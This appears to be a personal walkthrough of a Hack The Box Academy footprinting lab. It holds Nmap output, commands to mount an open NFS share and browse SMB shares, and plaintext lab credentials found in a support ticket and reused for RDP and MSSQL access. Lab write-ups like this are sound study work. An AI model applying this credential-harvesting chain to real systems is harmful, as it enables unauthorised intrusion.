Medium Lab
May 18, 2024
# Nmap 7.94 scan initiated Sat May 18 00:33:17 2024 as: nmap -sC -sV -sS -oN nmap -vv 10.129.202.41
Nmap scan report for 10.129.202.41
Host is up, received echo-reply ttl 127 (0.29s latency).
Scanned at 2024-05-18 00:33:18 PST for 107s
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
2049/tcp open nlockmgr syn-ack ttl 127 1-4 (RPC #100021)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2024-05-17T16:35:02+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=WINMEDIUM
| Issuer: commonName=WINMEDIUM
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-16T16:31:08
| Not valid after: 2024-11-15T16:31:08
| MD5: 9e56:26fa:d8bf:3278:17e9:7b85:c601:258e
| SHA-1: fc99:f1c2:c7b1:9885:1e2b:8e88:c7d1:175f:aa5c:4d3b
| -----BEGIN CERTIFICATE-----
| MIIC1jCCAb6gAwIBAgIQGPITOA3tdIBCgx2Mi4BeSDANBgkqhkiG9w0BAQsFADAU
| MRIwEAYDVQQDEwlXSU5NRURJVU0wHhcNMjQwNTE2MTYzMTA4WhcNMjQxMTE1MTYz
| MTA4WjAUMRIwEAYDVQQDEwlXSU5NRURJVU0wggEiMA0GCSqGSIb3DQEBAQUAA4IB
| DwAwggEKAoIBAQDUzzxYqO7XT7EAwcx6rPUSVl2Cs8Wu4JVrw7c6Wir4Of7uPRb3
| GB+jEGOJWsA2CO0rAhZQI5+0eBW7XY314kaeIetAq3n92kvUho4j8yLCXbI8WCFl
| Ef3t/Oi6cn9RzO/wjsTs7yHaYFeMlgsokw3YFwgKoqsz2L6u2XdWINKmNFnlQHVr
| MRweKqj3qnSSU9robwaCTE7LH+N2yQaZluKlhWWqNoJG7kTBmKavKgA/m2gAVFIN
| p05YpbeA+QQTZC++2SO4UphJIJ6E71MFyqmpICYQJ2n6D9LOIq1qzOZycjYA0UEd
| iRceT/kih/WJKxmFezCF0T2wYja2y0tLGad5AgMBAAGjJDAiMBMGA1UdJQQMMAoG
| CCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEASBTbLWfx
| S5WVVRfGNkdsWXyl4YUEgSb0IlJeq19oyLVJzEoogCtqdI0U3r9mxIUlr4tL+Jge
| d/4Lb3tMvdw2xZzK6sHAT2w0oz72N9ac9cwNr5tAqERiKITNHMI0b5/OMsG9rCYv
| 6sACitefwVYIoK53qFjg6bJ604hnIqg8hocYypJCDxFNn0gYzZpamhghh80n4Mdl
| 6HCttN/Kax0/zZZejpe98FxcWN62UwgNoQUem4dRJ8pF4VOX5NYcT8Cu1vuqw3sx
| OFT3UIosQU6UwhdDVr4NeoJ2PZSAja+VfzN8TrX+tf0Smce5oYm1vaL0lh8v8/4G
| 6pwEk2uLSPXdkg==
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: WINMEDIUM
| NetBIOS_Domain_Name: WINMEDIUM
| NetBIOS_Computer_Name: WINMEDIUM
| DNS_Domain_Name: WINMEDIUM
| DNS_Computer_Name: WINMEDIUM
| Product_Version: 10.0.17763
|_ System_Time: 2024-05-17T16:34:36+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 47689/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46177/tcp): CLEAN (Couldn't connect)
| Check 3 (port 28088/udp): CLEAN (Timeout)
| Check 4 (port 27218/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-05-17T16:34:39
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 18 00:35:05 2024 -- 1 IP address (1 host up) scanned in 107.71 secondssudo showmount -e IP
mkdir /tmp/attacker
sudo mount -t nfs 10.129.61.86:/TechSupport /tmp/attacker/
cd /tmp/attacker
cp ticket4238791283782.txt /home/kyou/academy-htb/footprinting/medium-lab/tickets
Conversation with InlaneFreight Ltd
Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello,.
So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:
1smtp {
2 host=smtp.web.dev.inlanefreight.htb
3 #port=25
4 ssl=true
5 user="alex"
6 password="lol123!mD"
7 from="alex.g@web.dev.inlanefreight.htb"
8}
9
10securesocial {
11
12 onLoginGoTo=/
13 onLogoutGoTo=/login
14 ssl=false
15
16 userpass {
17 withUserNameSupport=false
18 sendWelcomeEmail=true
19 enableGravatarSupport=true
20 signupSkipLogin=true
21 tokenDuration=60
22 tokenDeleteInterval=5
23 minimumPasswordLength=8
24 enableTokenJob=true
25 hasher=bcrypt
26 }
27
28 cookie {
29 # name=id
30 # path=/login
31 # domain="10.129.2.59:9500"
32 httpOnly=true
33 makeTransient=false
34 absoluteTimeoutInMinutes=1440
35 idleTimeoutInMinutes=1440
36 }
---
smbclient -U alex -L 10.129.61.86
smbclient -U alex \\\\10.129.61.86\\devshare
sa:87N1ns@slls83
smbclient -U alex \\\\10.129.61.86\\Users
cd alex
ls
cd Desktop
ls
Then i try using rdp to login as alex user
After that just run as a admin user the mssql studio
remmina
Last updated